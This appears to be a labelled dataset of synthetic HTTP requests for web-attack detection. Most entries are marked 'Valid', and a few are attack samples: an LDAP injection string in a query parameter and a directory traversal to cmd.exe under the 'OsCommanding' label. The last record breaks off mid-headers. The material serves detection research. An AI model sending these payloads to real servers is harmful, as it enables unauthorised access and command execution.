X-Forwarded-For: 45.36.94.83
X-Serial-Number: 0421946796861302632
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3gWQnodegZxr=13&eris=1356857&ean2ttuyM=3404866

End - Id: 33153
Start - Id: 876
class: Valid
GET /oGdG/Gpp/l7xb/tn/n1WgUCbGXXzhKqd5pnL.tiff? HTTP/1.1
Host: 230.198.146.2
Connection: seewre
Accept: application/rtf;q=0.2, text/*;q=0.2
Accept-Charset: iso-2022-kr, euc-tw;q=0.1, iso-8859-15;q=0.2
Accept-Encoding: identity, identity, deflate;q=0.6, compress;q=0.4, identity;q=0.0
Accept-Language: *
Cache-Control: min-fresh=01
Client-ip: 200.138.242.236
Cookie: orirwgevc5nejeh=829281;aCamstvdxtTIlLg=binoptW?awtei;0@a0c8P07divwO=500211;oErrne=17282
Cookie2: $Version="745"
Date: Mon, 11 Feb 08 14:09:44 CET
ETag: W/"0UHLnbcZRZDpejE"
Expect: 100-continue
From: deiSLdc@enaitimcoi.fr
If-Modified-Since: Wed, 31 Aug 05 20:16:23 UTC
If-Unmodified-Since: Sat, 06 Jan 07 10:42:37 UTC
If-Match: "zvOimpbQplE1b2DUoH"
If-None-Match: *
If-Range: Sun, 28 Dec 08 17:45:01 GMT
Max-Forwards: 27
MIME-Version: 6.2
Pragma: 8ws='ni'
Proxy-Authorization: Basic OXhsczppOWFhZmVh
Authorization: Basic M2ZkZmk6bzBsZQ==
Range: 95471-
Referer: http://shciJfa.gov/jewhy/3acmestt/erWsOrs1.avi
TE: trailers,gzip,chunked
Trailer: Authorization
User-Agent: Mozilla/5.6 (Machintosh; U; PPC 7.5; ae-9a; rv:0.3.6) Gecko/75249315
UA-CPU: 68000
UA-Disp: 1675,0086,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 130x106
Via: HTTP/0.7 160.254.150.41, 5.7 141.45.191.224
Transfer-Encoding: etsne3
Upgrade: 3orSlt/1.8, ndNfp3/7.7
Warning: 365 118.102.144.238 "T2htwaueRex7" 
X-Forwarded-For: 44.170.70.161
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 876
Start - Id: 11731
class: Valid
GET /em2Y1fzJSY/hngoeutnf8/eRDuEd7NygZHB/MIhomeP.gif?adrqelrdcs=yoetelecn5naevp&sirtf72r6=f&35X7-eBLRyh=copyPloge7ede&hs1i=LwgjctUwoza4tsis&ios=683685812&seynis=58290&eioaghgginnor=hie&z1mNOntegrg5inx=0&o1mcodah=+s%281G&hHevaedjUEr1e=yg3Soo&qWkLwbetweenselectu=bgsound%5D0a%25aq%2F&tetoubTnuAnWe=%5D%5Dn%26 HTTP/1.1
Host: 230.224.200.85
Connection: keep-alive
Accept: image/png, application/*;q=0.6
Accept-Charset: euc-jp;q=0.2, utf-8
Accept-Encoding: gzip;q=0.8, compress;q=0.2
Accept-Language: sjsror6D-eedaoi, S-cnues;q=0.3, Tsnihoi-eto, 2hiesoor-nmxnne;q=0.2
Cache-Control: only-if-cached
Client-ip: 79.71.44.119
Cookie: eaeAlle=u;ineuithchy64san=resWs3-exi9;Daorg1VK4u-=se;rFhkVHNqG=tttexecrhk
Cookie2: $Version="6"
Date: Sun, 13 Sep 09 20:27:37 CET
ETag: W/"ZEfZWUT785lz5V94i"
Expect: 100-continue
From: lAuala@v9ti4o.be
If-Modified-Since: Wed, 22 Jul 09 04:53:05 GMT
If-Unmodified-Since: Fri, 02 Jan 09 22:25:35 GMT
If-Match: "My4YakNKJ6OTpkVi"
If-None-Match: *
If-Range: Tue, 03 Feb 04 11:57:41 CET
Max-Forwards: 96
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest response="aC035b73FACF986E93e1E771dF14eF2b"
Authorization: NTLM WXJhdXJhdGlkbWVzblNpaXJyYnNvaWNyaG95ZXJyNmUz
Range: 1-,5-,24371-73606
Referer: http://o9smd5ob.fr/bhoF9i/dTAh/qhhk.html
TE: gzip,trailers,trailers
Trailer: Accept-Language
User-Agent: y@kvbX2M http://www.eauo.st
UA-CPU: x86
UA-Disp: 7321,446,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0846x910
Via: ymo/5.7 249.187.44.214, FTP/7.0 www.sT0nm.shtml
Transfer-Encoding: identity
Upgrade: ev2/2.0
Warning: 663 www.ynai9.tiff "n7t2mdsRiashos" "Fri, 19 Jun 09 23:55:59 UTC"
X-Forwarded-For: 173.221.98.4
X-Serial-Number: 68893779
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 11731
Start - Id: 12775
class: Valid
GET /iX1/b1OKadKtLp3HyC/uMtAfW/0l-xRwinntD_xku.aspx?ehwrlItevnlsprU=3863&lpyldEnXz=88O&dppedcrrauqtnie=g7&3QMtboot.ini=nt&r8ubel0euo=3&tsu=amsdMdsri&leijirc4te=i8dnesbe2rateaiframere&Ss=929&7sieimhtH=0180&eoeefbns5s=llrseR&eysoisojn=Y7ossj&hkAS5ULLdadiv=6zMesm&eeEiflf=21763&eSein4nuanaiho=5&Wusp=etaebRf++ HTTP/1.1
Host: 81.157.10.166
Connection: 9ArGr
Accept: */*
Accept-Charset: x-mac-hebrew, iso-8859-8
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: min-fresh=4
Client-ip: 168.120.105.84
Cookie: TfFgbh=dbp
Cookie2: $Version="859"
Date: Mon, 28 Nov 05 21:50:42 GMT
ETag: "VJl0IzjV_EBtGYqZ-TRf"
Expect: 100-continue
From: 2ttaM@etgid.uk
If-Modified-Since: Sat, 21 Oct 06 05:07:37 CET
If-Unmodified-Since: Sun, 03 Dec 06 18:01:42 GMT
If-Match: *
If-None-Match: "WH3xm@M9rB2KTezFE"
If-Range: Fri, 25 Aug 06 16:51:15 CET
Max-Forwards: 032
MIME-Version: 7.0
Pragma: tO5EmlhM='wisd8U'
Proxy-Authorization: Digest nc=eFF069e5
Authorization: Basic c2VvcmxzOmk2bnRuQnA=
Range: 73-,-14869,097850-
Referer: /leeevn/augf/ZlaHt/od7E5/hniEetSs.cgi
TE: deflate,trailers,trailers
Trailer: Accept-Charset
User-Agent: 9vsSTsnrotgbdoDctne
UA-CPU: MIPS
UA-Disp: 508,842,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 386x735
Via: 8.2 www.oNheoR.htm, YUccz/9.6 164.81.135.253
Transfer-Encoding: gzip
Upgrade: DoR/2.1, rahogo/2.6
Warning: 065 87.213.158.82:4233 "lisU" "Sat, 03 Apr 10 16:33:21 UTC"
X-Forwarded-For: 192.196.28.56
X-Serial-Number: 29101464435877036
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12775
Start - Id: 9633
class: Valid
GET /Tna.html?ine8nissfjn=9ZZkk-yFLtMo&zeht=e%29gzre%5BccatE8En5rd&lhlnresartmi3r=ll&tinhnnorhh=eho%5Dr8tt0&ctqaTifnr=9Uzt&rqreevssSdoamjd=ejDgr3iext&sreel8euaeanA=n1M5etaE&unBp3=36&or=e8jrifey7mxRh2csl HTTP/1.1
Host: 116.5.84.239
Connection: sxTsOxrr
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, identity;q=0.4, identity;q=0.1, deflate, compress
Accept-Language: cxbS4-Rinrii;q=0.3, oczt-rdT;q=0.3
Cache-Control: min-fresh=01446
Client-ip: 120.240.123.192
Cookie: servicesOeTWnph-=ehreplacelee$urs%2qwane ;epdQha=uVeBSedrS9m;s1ythiseoxrtn=gSVybioro12
Cookie2: $Version="50"
Date: Fri, 04 Nov 05 04:23:04 UTC
ETag: W/"6V@0b_Cx6yUffXrz6Uc"
Expect: n66hah
From: yiJqeaa@9hauhsGph.fr
If-Modified-Since: Sun, 30 Sep 07 21:10:57 GMT
If-Unmodified-Since: Thu, 23 Apr 09 23:12:12 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 19 Aug 08 19:58:35 CET
Max-Forwards: 965
MIME-Version: 7.5
Pragma: e='ofhM'
Proxy-Authorization: jyhe b0tkvyos=lioe3l1
Authorization: rw7Sok yscil=vnrsa
Range: -11893
Referer: http://www.snsv.cz/sYwmx1D.asp
TE: chunked;q=0.3
Trailer: Host
User-Agent: stsptberco (ru12EdE4@x; t_n3hOaFA; 89hOsy; tPhUFD)
UA-CPU: PowerPC
UA-Disp: 8659,744,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 9491x5662
Via: ci6/3.8 www.zea1TH.png:55692, FTP/2.6 190.147.21.82
Transfer-Encoding: identity
Upgrade: sNh/6.5, ssodh/7.1, jrin/2.9, wHoee/3.7, reoo9/6.9
Warning: 164 82.241.159.133:9392 "l0dn" "Thu, 31 Aug 06 03:05:43 UTC"
X-Forwarded-For: 125.170.3.143
X-Serial-Number: 04486
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9633
Start - Id: 17288
class: Valid
GET /taBe22pictfnaljle/m9sMStxeLelrrvte.png?oFsaae02uge5=2585&kydIechnnp4=5cYshutdowne&neeo9li=E%2Fl5aht%5Cn+%3E&zyE6xftRThsyo=ybfociape&nEeeiekandeeeb=94&rvlaoG=8847648&4e=tn4h0to+j+&hirlcr=nrncr4f4c1+hr-jaeg&howkelofiawane=ide&eceer8oitiSum=sn3&OE99itgOtaswhis=a0O0hrT&oth=sueoi&emttfeoTyun=rccttesb5EdnA&ihoC2oqlhreomqy=maoinsertiiaxmle6+a&sad08ao=wXeV0 HTTP/1.0
Host: www.oasaegaend.biz:80
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: o4obgpiw-Bze, ln-7nlB;q=0.4, gaad-huonnn;q=0.6, otane-hotle0i;q=0.0, iE-yslugs
Cache-Control: max-age=78208
Client-ip: 25.163.183.187
Cookie: window.openHq7sM.zUWd=27;bi=iysoTYh;ssetivr4sOdfiH=407924
Cookie2: $Version="69"
Date: Mon, 16 Apr 07 22:10:15 CET
ETag: "XjZ4NGP2E_4kGeo@jWc"
Expect: 100-continue
From: ahipt@bhraulhaa.fr
If-Modified-Since: Mon, 08 Aug 05 15:38:16 GMT
If-Unmodified-Since: Wed, 03 Sep 08 12:47:09 UTC
If-Match: "Ct2GuJQdJIxSWYCu"
If-None-Match: *
If-Range: Thu, 18 Dec 08 13:14:28 UTC
Max-Forwards: 06
MIME-Version: 0.0
Pragma: is='ueyo5i'
Proxy-Authorization: vcii rete=pno3Stie
Authorization: 5eej e0sroiie=rotinth
Range: 832093-91016
Referer: /lEnlur/abtdjlus/tluu/otoxOb/tHEotHss.js
TE: trailers
Trailer: Pragma
User-Agent: 1wmoaetm2h/1.6.9.1.4
UA-CPU: StrongARM
UA-Disp: 7151,7445,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0027x5589
Via: 4.0 www.rqrar.js
Transfer-Encoding: gzip
Upgrade: gnAe/7.4, rOl/6.6, iTAn/0.8
Warning: 819 33.81.58.189:59 "sxjEOamwna" 
X-Forwarded-For: 153.184.197.192
X-Serial-Number: 835471798337
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17288
Start - Id: 22829
class: Valid
GET /isbR.n/becv.XdbQ7YE1sjXQqtZ/xeohXsTzOoaSdsgep/aH9.cfm?inNLeeeot=NhmniorSweb&re=tuTdsh1aiW&Ct=e%3Efg&eahdte=lca&yaNchmac4tNalla=1yeubmerEttomeiny&5lalfqrhlca=teryqizR&eursrlnhla3ree=adiverscriptn&aojauOe=ecQ_E3Ny&Tshi0C2rowi=4_.&ysjmpctlrere=6558&tb0baah=s85qqe2rCRT&IOhttpPa98havingMQ0=8PNzinWEC&XeDXn2j=7Talcerbgsoundservicesp%7Eecmde%3D%26r7 HTTP/1.1
Host: www.pbHi3s.uk
Connection: close
Accept: image/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 37.79.49.124
Cookie: N8Oboot.inihFuzfDN=O;tufgn7psuscheem=21660953;xsee=506
Cookie2: $Version="00"
Date: Sun, 12 Jul 09 13:18:29 UTC
ETag: W/"QCjIOmJWB2OVCtrAtBy"
Expect: eNraa
From: ea3t@i3OhaEidC.uk
If-Modified-Since: Fri, 30 Oct 09 04:53:08 UTC
If-Unmodified-Since: Mon, 19 Mar 07 18:58:03 GMT
If-Match: "GuBQlRS25@Ay9zEbCr7"
If-None-Match: "pj0oFF.VHtECLuh3kM"
If-Range: Wed, 18 May 05 11:36:34 CET
Max-Forwards: 4568
MIME-Version: 0.0
Pragma: lsuc=HTL2e6Ou
Proxy-Authorization: NTLM YXNucmlkZW5uaXJuaGNzcGVuZHM5c29zZW1ycmVlZXVpb2RJck5hdHU1cjJpRQ==
Authorization: Digest algorithm=MD5
Range: 1016-,1-936,-4477
Referer: /lcod/sroe/mx2isur.png
TE: deflate;q=0.7,trailers,gzip;q=0.7
Trailer: Upgrade
User-Agent: Mozilla/5.0 (X11; U; Unix 4.4; ro-re; rv:0.2.2) Gecko/05670159
UA-CPU: 68000
UA-Disp: 272,8020,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0384x569
Via: HTTP/3.6 61.0.242.33:212, 0.2 www.ea3ecual.htm:43
Transfer-Encoding: gzip
Upgrade: hrnaea/8.0, Re4t/7.6, 7c4/1.7, 3hq/6.9
Warning: 474 www.urLt.html "oPensm" "Thu, 17 Jul 08 17:25:25 GMT"
X-Forwarded-For: 207.142.89.78
X-Serial-Number: 8712140
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22829
Start - Id: 37891
class: LdapInjection
GET /unionuKHN/t-Rm0McyJuNC1mR/e4RHcVdc/oLWNO.shtml?allF1qzCctelnet=%29++++%28+++%7C++++%28++cn%3D*o+%27brien*++++%29%28mail++%3D*o++++%27brien*+%29+++ HTTP/1.0
Host: www.xndaill.uk
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.3, compress
Accept-Language: tgn-oqhen;q=0.1
Cache-Control: no-transform
Client-ip: 64.67.93.181
Cookie: 5s=ipassthru;6BS_position@rBL-dropT=tw\r5nq;swO-V=l2Ssr;BmwhereRyGlE3ZP=283
Cookie2: $Version="25"
Date: Mon, 12 Jul 04 14:53:31 UTC
ETag: W/"k_eK26HPsis_XTtOs"
Expect: 4UHf=yc9Ggg;iOlgaObr=Elden
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Wed, 25 Nov 09 17:06:42 UTC
If-Unmodified-Since: Sun, 17 Jun 07 08:40:59 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 10 Nov 09 24:54:11 GMT
Max-Forwards: 79
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic dWFlMDpEZHlhZW8=
Authorization: Digest nc=ebfc4BaD
Range: 77-8,-1840,4277-
Referer: /rgunmn/ahii.shtml
TE: chunked;q=0.3,deflate,trailers
Trailer: User-Agent
User-Agent: iV_@@tu_bu http://www.lneb.net
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 3.5 58.173.241.206
Transfer-Encoding: gzip
Upgrade: tcig/4.0, RShRui/9.0, srvafl/9.7, nklzey/9.3
Warning: 062 148.228.41.113 "sStn" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 9686105266248523
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37891
Start - Id: 31180
class: Valid
GET /lhriggj/naqX1BNe/oexecsxmlRC/anw0cEl3u3fseEegey/danbgnno/eiw8/C6_Nu/DzSlRIese.mdb?isoseQnd8gtre7i=yPkf%40A2fF&zww2gEt46Ptwe=787068569&omh4tottWdv=419988964&i9viei=%29icmdsa&fmias=tecthkeywzmrn&so=au&TdivHYgM=2389709460&me4=ra7yjsRCeeplliw&Wa_ZEFx_jJ=wssciaohkoodbo&uNtrgnLdeOUe7d=48902703&ds0etaeeBgn4n=Rs&8Ia=9&Weaua=TiUcFS3aiof HTTP/1.1
Host: www.tth7.st
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.5, x-mac-icelandic
Accept-Encoding: *
Accept-Language: igl-Erteel;q=0.9
Cache-Control: only-if-cached
Client-ip: 72.12.227.203
Cookie: ohenfch=262308562;p13R3dOprocessing-instructionZ=18;ZKUbinOU84=6715496;c4fnic=297788;dtsa5=u;sbloTeUsnrOm=bW5Xq
Cookie2: $Version="9"
Date: Sat, 23 Sep 06 21:49:28 CET
ETag: "JHsdapb1As9.D7D6."
Expect: 100-continue
From: 2pun@ildgulxsU.uk
If-Modified-Since: Wed, 07 Jun 06 18:22:57 GMT
If-Unmodified-Since: Thu, 10 Sep 09 01:09:14 UTC
If-Match: *
If-None-Match: "seCv2shz6MxIOmI"
If-Range: Sat, 10 May 08 10:22:50 CET
Max-Forwards: 955
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: t31q4h eigtbotb=ilotn
Authorization: NTLM MG85aW9hbDVlaXJsOXR3eW5ub3RtcmVodXRkMzZzbG53YWFPc24yb01oMGR0
Range: 487-253698,1-,198-1
Referer: /exui9s/dreYnho5/hasot/lnarbivs.jpg
TE: deflate,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/1.4 (Windows; U; WinNT 5.4; 3o-vc; rv:8.0.9) Gecko/84853430
UA-CPU: StrongARM
UA-Disp: 056,6829,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3376x378
Via: HTTP/7.8 www.q8tnotr.shtml:8, 1.7 31.236.108.24
Transfer-Encoding: compress
Upgrade: brmCe/3.7, du9/1.2, int/6.8, n1wopd/2.2
Warning: 047 www.AtoX9nes.js "hsmitves7S" "Sun, 30 Aug 09 10:25:13 CET"
X-Forwarded-For: 193.229.38.157
X-Serial-Number: 251100
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31180
Start - Id: 26352
class: Valid
GET /ldhlnb/pUXI.gif?oOedunw=51&25eTwget=hlou&l3htq1apga5y=09763094&s3uiowtwcmk=01&nfHinsertBS2h=e&eobhbZes=ameta&seshTilwu=26136674&tcmrfls6kaA=134250&rsRB=eo HTTP/1.0
Host: 206.218.248.37
Connection: Er0fEpo
Accept: application/zip, application/*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.4, compress, deflate;q=0.7, identity;q=0.6, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 154.55.13.229
Cookie: bYl6gaherhhTle=msttneetees9ti3a;e5fse3c07=e6|U;etzuesfIt8zdto=ng(/1lgroup by&eh zn;tbhgitoolt=4390;o0Mm=td%sock_stream
Cookie2: $Version="220"
Date: Sat, 03 Jan 09 13:41:02 GMT
ETag: W/"cSjr2j9ZFD-lBGB1"
Expect: auesetr=iahaYaol;paNis5ax
From: sgoc@eboade.org
If-Modified-Since: Sun, 20 Nov 05 16:11:39 GMT
If-Unmodified-Since: Sun, 16 Nov 08 18:15:20 GMT
If-Match: "cT.Y8LjfMa8Dw@R"
If-None-Match: "H2MVlgTESNVAH2aLcRo"
If-Range: Thu, 06 May 10 05:36:50 CET
Max-Forwards: 0
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic bmVyM2J1cjppRWlI
Authorization: Basic YXNvODppbjV0ZXI=
Range: 32801-,166-85196
Referer: /e2htI.nsf
TE: deflate,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.4 (Machintosh; U; PPC 7.7; h5-me; rv:1.2.3) Gecko/68756341
UA-CPU: 68000
UA-Disp: 4074,748,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7265x363
Via: 5.3 185.81.2.237, 1.4 2.41.58.217
Transfer-Encoding: 2bxo
Upgrade: f3i/7.2, 4xgd/4.9, 4m3er7/4.0, uiai/5.6
Warning: 770 www.isuhre.shtml:304 "o7pHi4i84noopu8" "Fri, 07 Aug 09 15:30:51 UTC"
X-Forwarded-For: 113.183.151.252
X-Serial-Number: 908761770500
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26352
Start - Id: 14585
class: Valid
GET /n@gaJPhNU7H1@Cfod4X3/zDh1g/xnetcatz.cgi?oitrntWamtral=elOllP&IitvhneTnc=d7a3iaaiausgux2yea&ays=nxtfasp&MCfUqi=ustyle5%5Dh0euh%29i&oritrsrruhe=211647&tfto=nOrikkx&eehsoaesanpt9=email%5DD%26%27hsqeopen59rmiaoAeval&emAhnh=ts0&6dseh0oteoopy=465961&e6nH5dzdtbae=gOLMnP&ltconpntanccn4=elvc0e%29dc1%2B&teassntwo=sN2aenoxea&5ftpCE1Chrcp_2=+&t8hSAh8Wj=msA HTTP/1.1
Host: www.U6shv.org
Connection: keep-alive
Accept: application/*;q=0.3, audio/basic, image/gif
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: vtno6o-lLafe;q=0.7, re6bOi9t-r;q=0.6, fvlo-aiblrM
Cache-Control: no-cache
Client-ip: 22.174.172.88
Cookie: iahtpassS_n@B5=833006;@GNn=l-.x2qtKwP;Io_evalkBc5a=7500422;E1ewOsilyiE= Md;nYUbW1l88.Df=lKaagZsxzd6hAhToe;sr4heuiieajifsh=97too
Cookie2: $Version="25"
Date: Tue, 10 Feb 04 04:16:05 GMT
ETag: "uufaQeQ6EAqIl1g"
Expect: ifii
From: dsle@oedeiuTgO.org
If-Modified-Since: Thu, 13 Nov 08 03:42:42 GMT
If-Unmodified-Since: Thu, 30 Oct 08 02:06:58 UTC
If-Match: "sSkWZEcCJshwmIO"
If-None-Match: *
If-Range: "oqUq1d-UXupB1z5B"
Max-Forwards: 916
MIME-Version: 8.7
Pragma: yy=moEa
Proxy-Authorization: Basic T2lzb21JeDpkZFlmdXFvdw==
Authorization: 93der sICtsed=ahne
Range: 45-4785,-21867,70176-3030
Referer: http://www.riter.be/8lehr/i2cSahm/notta/sotasr0J.dll
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: osaee/3.8
UA-CPU: PowerPC
UA-Disp: 1652,237,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 658x567
Via: 8.2 www.t0dOuDle.css
Transfer-Encoding: Mnip; smsahan=zRe2ee
Upgrade: aAup/3.4, wlhsoh/9.7, nbao/4.6
Warning: 663 www.eNonNsgt.tiff "zwetin" "Wed, 09 Feb 05 17:14:54 GMT"
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 30157700928193740
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14585
Start - Id: 43720
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: 45.84.13.69
Connection: keep-alive
Accept: audio/basic, video/mpeg;q=0.0
Accept-Charset: *
Accept-Encoding: identity, deflate, compress;q=0.1, identity, deflate
Accept-Language: N-rEs;q=0.0, d-2yesssn;q=0.1, iao1scaP-tSea;q=0.2
Cache-Control: no-cache
Client-ip: 183.153.88.199
Cookie: xUT36scriptW9-j=trevmm;pwp-2IUHhOC9R=640;NautoexecMNr-c=ertdthtaccesaf<9AuaT\<y 1;scd7y=Ot'
Cookie2: $Version="378"
Date: Thu, 08 May 08 23:32:17 UTC
ETag: W/"3BJWUYYJ2ACJTUS@l"
Expect: 100-continue
From: uhbqiisi@rmieagr.org
If-Modified-Since: Mon, 26 Jan 09 15:58:05 GMT
If-Unmodified-Since: Thu, 29 Jul 04 13:53:36 GMT
If-Match: "6MjIJR6DEMj0ukCJPmRB"
If-None-Match: "jSp8@YQCCbUK0mCd-."
If-Range: "hoQrK0RDR-MuOchvHKu"
Max-Forwards: 224
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM ZW5rZWVzZTBwY0l1aDdsbHdBMmxhT2VhT2FhNmNkeHRhd2U3bjQ=
Authorization: Basic ZGxlZVVyOnBzYWQ=
Range: 7008-71
Referer: /r6deeuE.tiff
TE: gzip,deflate
User-Agent: eht9n/5.0.3.9
UA-CPU: 68000
UA-Disp: 603,315,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 284x7393
Via: FTP/4.5 9.210.222.206:359
Transfer-Encoding: compress
Upgrade: fnetaM/4.9, l3e/1.2
Warning: 546 161.55.81.201 "zehnaoi8Htrab7epa" 
X-Forwarded-For: 175.133.115.65
X-Serial-Number: 601406
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43720
Start - Id: 27937
class: Valid
GET /PUAr8AaBoO5er/s-pjA4n-MK/Yd/tx4FkG0J@N/em/M3itOc6MO@H18I/t0eepRe/i69beb.swf?rebUooe=eErirprehstA&eea1ntr=46001&yo=i%3EuAc&n3axd=4483076953&nbasze=rnmil&theosr9h=i-REmoZj&eosCIsztoathu=dSmniyukrsnXr HTTP/1.0
Host: www.yeumk4taaT.de:46121
Connection: close
Accept: video/mpeg;q=0.2, audio/*;q=0.7, image/jpeg
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: l-e, aasme-T, iicnN-cet;q=0.5, fn-b
Cache-Control: n='rjtt'
Client-ip: 115.171.171.121
Cookie: 7vZrTiaaeac=as3km;a5iuu6CWnflRtn=360942
Cookie2: $Version="5"
Date: Sat, 26 Aug 06 12:57:04 UTC
ETag: "oKxKJqZqUr8EJj6KE"
Expect: 100-continue
From: aclt@ntyaoohns.cz
If-Modified-Since: Fri, 08 Dec 06 17:32:26 GMT
If-Unmodified-Since: Thu, 02 Apr 09 24:20:43 GMT
If-Match: "9ewugljFDwX80ulSo-2q"
If-None-Match: "H57c2nQtuwup@WJtwy"
If-Range: *
Max-Forwards: 998
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: aseiIS htdyI=sragn
Authorization: Basic NHRuZWNvOmVodG9kY3N2
Range: -14621,-370256
Referer: /l1htanz/ncloeiFl.doc
TE: trailers
Trailer: If-None-Match
User-Agent: ttoejdialealt
UA-CPU: Sparc
UA-Disp: 666,785,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0093x2454
Via: 2.9 125.82.169.76, 6.1 www.ducn.png:73258, 9.3 165.226.137.83
Transfer-Encoding: gzip
Upgrade: hrdi/7.3, pbnr/9.0, Etitb/6.6, cut/3.8
Warning: 832 59.92.226.57 "4ttWsncayb0" "Thu, 06 Dec 07 08:46:18 CET"
X-Forwarded-For: 122.177.179.211
X-Serial-Number: 149066712456
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27937
Start - Id: 23291
class: Valid
GET /k7ol8zdreemarebHi.gif? HTTP/1.0
Host: www.nalnncjul.ch
Connection: close
Accept: text/*, text/html;q=0.4, video/*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, gzip;q=0.5, compress, gzip;q=0.1, compress
Accept-Language: 3g-egtu;q=0.0
Cache-Control: l3=q
Client-ip: 213.72.83.203
Cookie: DexecgVitormRG4body=iniee2oms;tie2essr=adelete1;wiRarfonu=fMG;eozohtist=7;5c78p5Kfrm=t0arra&evocsiigri'a;ncheeabLn4Ots=709504
Cookie2: $Version="774"
Date: Sat, 19 Nov 05 05:31:48 CET
ETag: "ZXxsPor0lcszJI.OA18"
Expect: 100-continue
From: zttea@aht7uetl.it
If-Modified-Since: Sat, 09 Feb 08 11:21:23 GMT
If-Unmodified-Since: Sun, 03 Apr 05 07:54:59 CET
If-Match: "biXr5Om.yX@wc37lz"
If-None-Match: "lxxLMkvXH_n.KA0L26_P"
If-Range: "XxonQOz3@s_XWcPfRz"
Max-Forwards: 715
MIME-Version: 7.6
Pragma: qrTd=apAdlaa
Proxy-Authorization: NTLM dTBjaEVvb3NzUm92c2Jvc2xvcW05UllvMWxpcG5hVGUwZWVuZHRkb3Ns
Authorization: NTLM bGFvc25SbDhwYXljY252dDVXT2V0bGluM3NzYnNucmhuZW1zZQ==
Range: -8,52-66986
Referer: /iaNge.css
TE: deflate;q=0.6
Trailer: Upgrade
User-Agent: oDDhivFeo4 http://www.bt7twrx.org
UA-CPU: MIPS
UA-Disp: 139,6869,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 626x088
Via: 5.6 92.3.146.193, FTP/9.4 173.219.106.79:288
Transfer-Encoding: xhEion
Upgrade: etro5e/7.7, dH1i/3.8, rit/1.6
Warning: 500 49.153.182.242 "erstott" 
X-Forwarded-For: 232.26.81.244
X-Serial-Number: 1450242
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23291
Start - Id: 24671
class: Valid
GET /oyw10/xtsorg.png?5yoouomaeia=74280&3IDgroup byeval=atd&wsotayeN=Rn%3Dla HTTP/1.0
Host: 81.228.137.155
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9, us-ascii;q=0.0, iso-8859-8-i, utf-7
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-stale
Client-ip: 148.233.252.203
Cookie: Es2iiesP0yhe= mfte;fue=x@J_;kgitttS=2622369;ic=y/e@w\oDseR:=rwmno0aa;vo7bqnrlehtyon=83;iB.aE-=Doscag
Cookie2: $Version="2"
Date: Wed, 02 Jan 08 09:17:24 CET
ETag: W/"CQa1TueLN00oxXh"
Expect: u5o62at
From: tloo@08oaacota.gov
